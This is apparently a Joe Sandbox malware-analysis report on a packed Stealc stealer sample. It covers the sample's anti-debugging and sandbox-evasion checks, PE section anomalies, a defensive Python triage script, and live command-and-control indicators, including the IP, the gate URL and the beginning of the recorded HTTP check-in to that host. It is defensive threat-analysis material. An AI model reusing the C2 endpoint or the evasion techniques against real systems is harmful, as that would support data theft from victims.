                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0390 second address: 4DA0396 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA0396 second address: 4DA039C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 4DA039C second address: 4DA03A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78DE7D second address: 78DE82 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78E042 second address: 78E046 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 7AA846 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 79446A instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: 819AC0 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003938B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose | 0_2_003938B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00394910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_00394910
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose | 0_2_0038DA80
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA | 0_2_0038E430
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose | 0_2_0038ED20
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00394570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen | 0_2_00394570
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0038DE10
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose | 0_2_0038BE70
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0038F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_0038F6B0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00393EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose | 0_2_00393EA0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003816D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose | 0_2_003816D0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00381160 GetSystemInfo,ExitProcess | 0_2_00381160
                Source: file.exe, file.exe, 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: file.exe, 00000000.00000002.1701295497.0000000000E65000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW8
                Source: file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1701295497.0000000000E96000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: VMwareVMware
                Source: file.exe, 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13197
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13194
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13215
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13209
                Source: C:\Users\user\Desktop\file.exe | API call chain: ExitProcess graph end node | graph_0-13249
                Source: C:\Users\user\Desktop\file.exe | System information queried: ModuleInformation
                Source: C:\Users\user\Desktop\file.exe | Process information queried: ProcessInformation

                Anti Debugging

                Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SICE
                Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_003845C0 VirtualProtect ?,00000004,00000100,00000000 | 0_2_003845C0
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00399860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress | 0_2_00399860
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00399750 mov eax, dword ptr fs:[00000030h] | 0_2_00399750
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00397850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00397850
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

                HIPS / PFW / Operating System Protection Evasion

                Source: Yara match | File source: Process Memory Space: file.exe PID: 7492, type: MEMORYSTR
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00399600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle | 0_2_00399600
                Source: file.exe, file.exe, 00000000.00000002.1699507012.0000000000761000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: 3Program Manager
                Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree | 0_2_00397B90
                Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00396920 GetSystemTime,sscanf,SystemTimeToFileTime,SystemTimeToFileTime,ExitProcess | 0_2_00396920
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00397850 GetProcessHeap,RtlAllocateHeap,GetUserNameA | 0_2_00397850
                Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00397A30 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA | 0_2_00397A30

                Stealing of Sensitive Information

                Source: Yara match | File source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1658803350.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7492, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP

                Remote Access Functionality

                Source: Yara match | File source: 0.2.file.exe.380000.0.unpack, type: UNPACKEDPE
                Source: Yara match | File source: 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000002.1699333650.0000000000381000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                Source: Yara match | File source: 00000000.00000003.1658803350.0000000004C20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                Source: Yara match | File source: Process Memory Space: file.exe PID: 7492, type: MEMORYSTR
                Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK techniques with signature hits (number of matching signatures in parentheses; the other cells of the rendered matrix are the empty ATT&CK template and are omitted):

• Execution: Command and Scripting Interpreter (2), Native API (11)
• Persistence: DLL Side-Loading (1)
• Privilege Escalation: Process Injection (11), DLL Side-Loading (1)
• Defense Evasion: Masquerading (1), Virtualization/Sandbox Evasion (33), Disable or Modify Tools (11), Process Injection (11), Deobfuscate/Decode Files or Information (1), Obfuscated Files or Information (3), Software Packing (12), DLL Side-Loading (1)
• Discovery: System Time Discovery (2), Security Software Discovery (641), Virtualization/Sandbox Evasion (33), Process Discovery (13), Account Discovery (1), System Owner/User Discovery (1), File and Directory Discovery (1), System Information Discovery (324)
• Collection: Archive Collected Data (1)
• Command and Control: Encrypted Channel (2), Ingress Tool Transfer (2), Non-Application Layer Protocol (2), Application Layer Protocol (12)
• No hits: Reconnaissance, Resource Development, Initial Access, Credential Access, Lateral Movement, Exfiltration, Impact

The absence of Credential Access hits for a stealer is not surprising here: the C2 refused the check-in (see the HTTP conversation below), so the run never reached the collection stage.
Antivirus, machine-learning and URL detections

Source      Detection   Scanner          Label
file.exe    100%        Avira            TR/Crypt.TPM.Gen
file.exe    100%        Joe Sandbox ML

Dropped files, unpacked PE files and contacted domains: no antivirus matches.

URL                                             Detection   Scanner          Label
http://185.215.113.37/                          100%        URL Reputation   malware (listed twice)
http://185.215.113.37                           100%        URL Reputation   malware
http://185.215.113.37/e2b1563c6670f193.php      100%        URL Reputation   malware
http://185.215.113.37/e2b1563c6670f193.phpn     17%         Virustotal
http://185.215.113.37/ws                        17%         Virustotal
http://185.215.113.37/G                         17%         Virustotal
http://185.215.113.37/e2b1563c6670f193.phpG     17%         Virustotal

The four Virustotal rows are string-carving variants of the two real URLs (trailing bytes picked up from adjacent memory), not distinct endpoints.
Contacted domains: none (the sample connects to the C2 by IP address).

URLs from network traffic (all flagged malicious)
http://185.215.113.37/                        URL Reputation: malware (two hits); reputation unknown
http://185.215.113.37/e2b1563c6670f193.php    URL Reputation: malware; reputation unknown

URLs carved from process memory (all flagged malicious, reputation unknown unless noted)
http://185.215.113.37/e2b1563c6670f193.phpn     file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp
http://185.215.113.37/e2b1563c6670f193.php9U    file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp
http://185.215.113.37O                          file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp
http://185.215.113.37                           file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp (URL Reputation: malware)
http://185.215.113.37/.9                        file.exe, 00000000.00000002.1701295497.0000000000E1E000.00000004.00000020.00020000.00000000.sdmp
http://185.215.113.37/ws                        file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp
http://185.215.113.37/G                         file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp
http://185.215.113.37/e2b1563c6670f193.php%U    file.exe, 00000000.00000002.1701295497.0000000000E77000.00000004.00000020.00020000.00000000.sdmp
http://185.215.113.37/e2b1563c6670f193.phpG     file.exe, 00000000.00000002.1701295497.0000000000E96000.00000004.00000020.00020000.00000000.sdmp

The suffixed variants (phpn, php9U, O, .9, ws, G, php%U, phpG) are carving artefacts; the C2 consists of the host 185.215.113.37 and the single gate path /e2b1563c6670f193.php.
Contacted IP
IP               Domain    Country    ASN      ASN name                  Malicious
185.215.113.37   unknown   Portugal   206894   WHOLESALECONNECTIONSNL    true
                        Joe Sandbox version:41.0.0 Charoite
                        Analysis ID:1523789
                        Start date and time:2024-10-02 03:10:06 +02:00
                        Joe Sandbox product:CloudBasic
                        Overall analysis duration:0h 2m 37s
                        Hypervisor based Inspection enabled:false
                        Report type:full
                        Cookbook file name:default.jbs
                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:1
                        Number of new started drivers analysed:0
                        Number of existing processes analysed:0
                        Number of existing drivers analysed:0
                        Number of injected processes analysed:0
                        Technologies:
                        • HCA enabled
                        • EGA enabled
                        • AMSI enabled
                        Analysis Mode:default
                        Analysis stop reason:Timeout
                        Sample name:file.exe
                        Detection:MAL
                        Classification:mal100.troj.evad.winEXE@1/0@0/1
                        EGA Information:
                        • Successful, ratio: 100%
                        HCA Information:
                        • Successful, ratio: 80%
                        • Number of executed functions: 19
                        • Number of non-executed functions: 84
                        Cookbook Comments:
                        • Found application associated with file extension: .exe
                        • Stop behavior analysis, all processes terminated
                        • Report size getting too big, too many NtQueryValueKey calls found.
No simulations

Context

IP 185.215.113.37: seen in ten earlier Joe Sandbox analyses of samples named file.exe, all detected as malicious and all contacting 185.215.113.37/e2b1563c6670f193.php; six were classified Stealc and four Stealc, Vidar (hashes available via the report's "Get hash" links).
Domains: no context.
ASN WHOLESALECONNECTIONSNL: the same ten analyses, each with 185.215.113.37 as the contacted IP (six Stealc, four Stealc, Vidar).
JA3 fingerprints: no context.
Dropped files: no context.
                        No created / dropped files found
                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                        Entropy (8bit):7.947320576471026
                        TrID:
                        • Win32 Executable (generic) a (10002005/4) 99.96%
                        • Generic Win/DOS Executable (2004/3) 0.02%
                        • DOS Executable Generic (2002/1) 0.02%
                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                        File name:file.exe
                        File size:1'878'016 bytes
                        MD5:44397c793b2976c5571c32b11842e395
                        SHA1:d268ccdfb8eceb1f3ed0ccbb05f31b759528c0b7
                        SHA256:004cb0e8c07cc1b3f0613d1148d353c359ceffb8e2b27da445ed0eb11456b282
                        SHA512:b0f8eacb7045a7a79a1fcc17f1d181b6e3a17ad06fd5097920e6707a806c9f6fb70aa5397e7e2309b6a7f80593102fb34a54583adc5397d583b1612f67216829
                        SSDEEP:49152:OI0xvJVaKkL19qw8z+BDF0fV/HEkWa5ZWk:OIEMqw8iDFUfEkRZ/
                        TLSH:7E9533D21A128F1DFB443FB286B6D546157B0F1599C3F3FC4C32A4E96A2BB92439B405
                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........C..............X.......m.......Y.......p.....y.........`...............\.......n.....Rich............PE..L...J..f...........
                        Icon Hash:90cececece8e8eb0
                        Entrypoint:0xaab000
                        Entrypoint Section:.taggant
                        Digitally signed:false
                        Imagebase:0x400000
                        Subsystem:windows gui
                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                        DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                        Time Stamp:0x66F99A4A [Sun Sep 29 18:19:54 2024 UTC]
                        TLS Callbacks:
                        CLR (.Net) Version:
                        OS Version Major:5
                        OS Version Minor:1
                        File Version Major:5
                        File Version Minor:1
                        Subsystem Version Major:5
                        Subsystem Version Minor:1
                        Import Hash:2eabe9054cad5152567f0699947a2c5b
Instruction (linear disassembly of the bytes at the entry point 0xaab000 in .taggant; runs of "add byte ptr [eax], al", which is how two zero bytes decode, are collapsed with a count):
  jmp 00007F701CE1808Ah
  jbe 00007F701CE180A2h
  add byte ptr [eax], al
  jmp 00007F701CE1A085h
  add byte ptr [ebx], al
  or al, byte ptr [eax]
  add byte ptr [eax], al           (x2)
  add byte ptr [eax], dh
  add byte ptr [eax], al           (x3)
  add byte ptr [ecx], al
  add byte ptr [eax], al           (x7)
  add byte ptr [ecx], al
  add byte ptr [eax], 00000000h
  add byte ptr [eax], al           (x2)
  adc byte ptr [eax], al
  add byte ptr [eax], al           (x3)
  push es
  or al, byte ptr [eax]
  add byte ptr [eax], al           (x2)
  add byte ptr [eax], dh
  add byte ptr [eax], al           (x11)
  add byte ptr [ecx], al
  add byte ptr [eax], 00000000h
  add byte ptr [eax], al           (x2)
  adc byte ptr [eax], al
  add byte ptr [eax], al           (x3)
  add ecx, dword ptr [edx]
  add byte ptr [eax], al           (x3)
  adc byte ptr [eax], al
  add byte ptr [eax], al           (x3)
  or ecx, dword ptr [edx]
  add byte ptr [eax], al           (x7)
  or al, 80h
  add byte ptr [eax], al           (x3)
  adc byte ptr [eax], al
  add byte ptr [eax], al           (x3)
  add ecx, dword ptr [edx]
  add byte ptr [eax], al           (x3)
  xor byte ptr [eax], al
  add byte ptr [eax], al           (x3)
  add dword ptr [eax], eax
  add byte ptr [eax], al           (x7)
  add dword ptr [eax+00000000h], eax
  add byte ptr [eax], al
Only the first jmp executes in straight-line flow; the bytes after it are dominated by zeros and small constants, consistent with a data structure rather than code, so the listing beyond the first instruction carries no information about the unpacking stub.
                        Programming Language:
                        • [C++] VS2010 build 30319
                        • [ASM] VS2010 build 30319
                        • [ C ] VS2010 build 30319
                        • [ C ] VS2008 SP1 build 30729
                        • [IMP] VS2008 SP1 build 30729
                        • [LNK] VS2010 build 30319
Data directories (name, virtual address, size, containing section)
IMAGE_DIRECTORY_ENTRY_IMPORT         0x25d050   0x64   .idata
IMAGE_DIRECTORY_ENTRY_BASERELOC      0x25d1f8   0x8    .idata
All other directories (EXPORT, RESOURCE, EXCEPTION, SECURITY, DEBUG, COPYRIGHT, GLOBALPTR, TLS, LOAD_CONFIG, BOUND_IMPORT, IAT, DELAY_IMPORT, COM_DESCRIPTOR, RESERVED) are 0x0 / 0x0. Note that SECURITY is empty (unsigned, matching "Digitally signed: false") and the IAT directory is empty even though one import exists.
Sections (name, virtual address, virtual size, raw size, MD5, Xored PE, ZLIB complexity, file type, entropy, characteristics)
(unnamed)   0x1000     0x25b000   0x22800    38ba5dd174f68bafa0e3ee85e18196c0   unknown   unknown               unknown               unknown              INITIALIZED_DATA, EXECUTE, READ, WRITE
.rsrc       0x25c000   0x1000     0x0        d41d8cd98f00b204e9800998ecf8427e   False     0                     empty                 0.0                  INITIALIZED_DATA, READ, WRITE
.idata      0x25d000   0x1000     0x200      c60c4959cc8d384ac402730cc6842bb0   False     0.1328125             data                  0.9064079259880791   INITIALIZED_DATA, READ, WRITE
(unnamed)   0x25e000   0x2a7000   0x200      afd201fc1b4583ae7807301857bb1476   unknown   unknown               unknown               unknown              INITIALIZED_DATA, EXECUTE, READ, WRITE
xspzzdod    0x505000   0x1a5000   0x1a4600   72f397057ba1861aac812bed604ccc08   False     0.99486077813708      OpenPGP Public Key    7.952856014840197    INITIALIZED_DATA, EXECUTE, READ, WRITE
ngzkmgsa    0x6aa000   0x1000     0x400      6a5530d7d26890d8ad0cafbfe0aa0baa   False     0.77734375            data                  6.09879566064824     INITIALIZED_DATA, EXECUTE, READ, WRITE
.taggant    0x6ab000   0x3000     0x2200     a33d7d43d03ef404fe88227b1b19d0d9   False     0.05951286764705882   DOS executable (COM)  0.7174442702629957   INITIALIZED_DATA, EXECUTE, READ, WRITE

Everything in this table points at a commercial protector rather than a plain compiler output: five of seven sections are RWX, two have no name and two have random eight-letter names, the 0x2a7000-byte unnamed section occupies 0x200 bytes on disk (a zero-filled region for the unpacked image), xspzzdod holds 1.7 MB at entropy 7.95 (the compressed or encrypted payload; the "OpenPGP Public Key" file type is a false positive from the magic-number scan), and the entry point sits in .taggant, whose name comes from the IEEE ICSG Taggant System that packers such as Themida/WinLicense embed. The MD5 d41d8cd98f00b204e9800998ecf8427e for .rsrc is the hash of zero bytes. Static analysis of the stealer itself therefore has to be done on the unpacked memory image (0.2.file.exe.380000.0.unpack), not on this file.

Imports
DLL            Import
kernel32.dll   lstrcpy

A single import is the other half of the same picture: every other API the execution graph shows (LoadLibraryA/GetProcAddress, WinINet, event and heap functions) is resolved at run time.
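As an added example (not Joe Sandbox code), the following script encodes the static triage reasoning above as a reusable function: it takes a section table plus entry point, import list and file entropy, and returns the findings a reviewer would otherwise read off the table by hand. The SECTIONS, IMPORTS, ENTRYPOINT, IMAGEBASE and FILE_ENTROPY values are transcribed from the report; the entropy threshold and the set of "standard" section names are my own choices. On a real sample you would populate SECTIONS from pefile (Name, VirtualAddress, Misc_VirtualSize, SizeOfRawData, Characteristics, get_entropy()).

```python
"""Section-table triage for the PE described in this report (example code)."""
from dataclasses import dataclass
from typing import Dict, List, Optional

# Section characteristic bits from winnt.h
IMAGE_SCN_CNT_INITIALIZED_DATA = 0x00000040
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_READ = 0x40000000
IMAGE_SCN_MEM_WRITE = 0x80000000
RWX = IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE | IMAGE_SCN_MEM_EXECUTE
RW_DATA = IMAGE_SCN_CNT_INITIALIZED_DATA | IMAGE_SCN_MEM_READ | IMAGE_SCN_MEM_WRITE
RWX_DATA = RW_DATA | IMAGE_SCN_MEM_EXECUTE

# Names a linker emits on its own; anything else deserves a look (my list).
STANDARD_NAMES = {".text", ".data", ".rdata", ".idata", ".edata", ".rsrc",
                  ".reloc", ".bss", ".tls", ".pdata", ".CRT", ".textbss"}
PACKED_ENTROPY = 7.2  # threshold (my choice); 8.0 is the theoretical maximum


@dataclass
class Section:
    name: str                  # "" for the two unnamed sections
    va: int                    # RVA
    vsize: int
    raw_size: int
    entropy: Optional[float]   # None where the report shows "unknown"
    characteristics: int


# Transcribed from the report's section table (entropies rounded).
SECTIONS = [
    Section("",         0x1000,   0x25b000, 0x22800,  None,  RWX_DATA),
    Section(".rsrc",    0x25c000, 0x1000,   0x0,      0.0,   RW_DATA),
    Section(".idata",   0x25d000, 0x1000,   0x200,    0.906, RW_DATA),
    Section("",         0x25e000, 0x2a7000, 0x200,    None,  RWX_DATA),
    Section("xspzzdod", 0x505000, 0x1a5000, 0x1a4600, 7.953, RWX_DATA),
    Section("ngzkmgsa", 0x6aa000, 0x1000,   0x400,    6.099, RWX_DATA),
    Section(".taggant", 0x6ab000, 0x3000,   0x2200,   0.717, RWX_DATA),
]
IMPORTS: Dict[str, List[str]] = {"kernel32.dll": ["lstrcpy"]}
IMAGEBASE = 0x400000
ENTRYPOINT = 0xAAB000   # VA as reported; RVA 0x6ab000
FILE_ENTROPY = 7.947


def find_section(sections: List[Section], rva: int) -> Optional[Section]:
    """Return the section containing an RVA, sizing by the larger of virtual/raw size."""
    for s in sections:
        if s.va <= rva < s.va + max(s.vsize, s.raw_size):
            return s
    return None


def triage(sections: List[Section], entrypoint_va: int, imagebase: int,
           imports: Dict[str, List[str]], file_entropy: float) -> List[str]:
    """Human-readable findings; an empty list means nothing looked unusual."""
    findings: List[str] = []
    ep = find_section(sections, entrypoint_va - imagebase)
    if ep is None:
        findings.append("entry point lies outside every section")
    elif ep.name not in {".text", "CODE"}:
        findings.append(f"entry point in non-standard section {ep.name or '<unnamed>'!r}")
    for s in sections:
        label = s.name or "<unnamed>"
        if s.characteristics & RWX == RWX:
            findings.append(f"{label}: RWX")
        if s.name == ".taggant":
            findings.append(f"{label}: IEEE Taggant section (commercial protector marker)")
        elif not s.name:
            findings.append(f"{label}: empty section name")
        elif s.name not in STANDARD_NAMES:
            findings.append(f"{label}: non-standard section name")
        if s.entropy is not None and s.entropy >= PACKED_ENTROPY:
            findings.append(f"{label}: entropy {s.entropy:.2f}, compressed or encrypted")
        # Large in memory but tiny on disk: a zero-filled area the stub unpacks into.
        if s.raw_size < 0x1000 and s.vsize >= 0x10000:
            findings.append(f"{label}: {s.vsize:#x} virtual vs {s.raw_size:#x} on disk, likely unpacking target")
    n_imports = sum(len(v) for v in imports.values())
    if n_imports < 5:
        findings.append(f"only {n_imports} import(s): APIs are resolved at run time")
    if file_entropy >= PACKED_ENTROPY:
        findings.append(f"file entropy {file_entropy:.2f}: packed")
    return findings


if __name__ == "__main__":
    for line in triage(SECTIONS, ENTRYPOINT, IMAGEBASE, IMPORTS, FILE_ENTROPY):
        print(line)
```

Run against the transcribed table it reports the entry point in .taggant, five RWX sections, the two unnamed and two random-named sections, the high-entropy xspzzdod section, the 0x2a7000-byte unpacking target, the single import and the packed file entropy; a plain compiler-built file with a .text entry point and a normal import table yields no findings.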
Suricata IDS alert
Timestamp:   2024-10-02T03:10:59.743753+0200
SID:         2044243
Signature:   ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in
Severity:    1
Flow:        192.168.2.4:49730 -> 185.215.113.37:80 TCP
The alert timestamp coincides with the client's ACK of the POST response below, i.e. the rule fired on the completed check-in exchange.

TCP packets (one connection, 192.168.2.4:49730 <-> 185.215.113.37:80)
Timestamp (CEST)                 Src port   Dst port   Direction
Oct 2, 2024 03:10:58.785684109   49730      80         client -> server
Oct 2, 2024 03:10:58.790647030   80         49730      server -> client
Oct 2, 2024 03:10:58.790747881   49730      80         client -> server
Oct 2, 2024 03:10:58.790890932   49730      80         client -> server   (GET /)
Oct 2, 2024 03:10:58.795619011   80         49730      server -> client
Oct 2, 2024 03:10:59.517076969   80         49730      server -> client   (200 OK, empty body)
Oct 2, 2024 03:10:59.517429113   49730      80         client -> server
Oct 2, 2024 03:10:59.520101070   49730      80         client -> server   (POST /e2b1563c6670f193.php)
Oct 2, 2024 03:10:59.524904966   80         49730      server -> client
Oct 2, 2024 03:10:59.743675947   80         49730      server -> client   (200 OK, 8-byte body)
Oct 2, 2024 03:10:59.743752956   49730      80         client -> server
Oct 2, 2024 03:11:02.316627979   49730      80         client -> server

HTTP hosts contacted: 185.215.113.37

HTTP sessions
Session ID   Source                 Destination           PID    Process
0            192.168.2.4:49730      185.215.113.37:80     7492   C:\Users\user\Desktop\file.exe
HTTP conversation (session 0)

Oct 2, 2024 03:10:58.790890932 CEST, 89 bytes OUT (connectivity probe; note that no User-Agent header is sent):
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache

Oct 2, 2024 03:10:59.517076969 CEST, 203 bytes IN:
HTTP/1.1 200 OK
Date: Wed, 02 Oct 2024 01:10:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

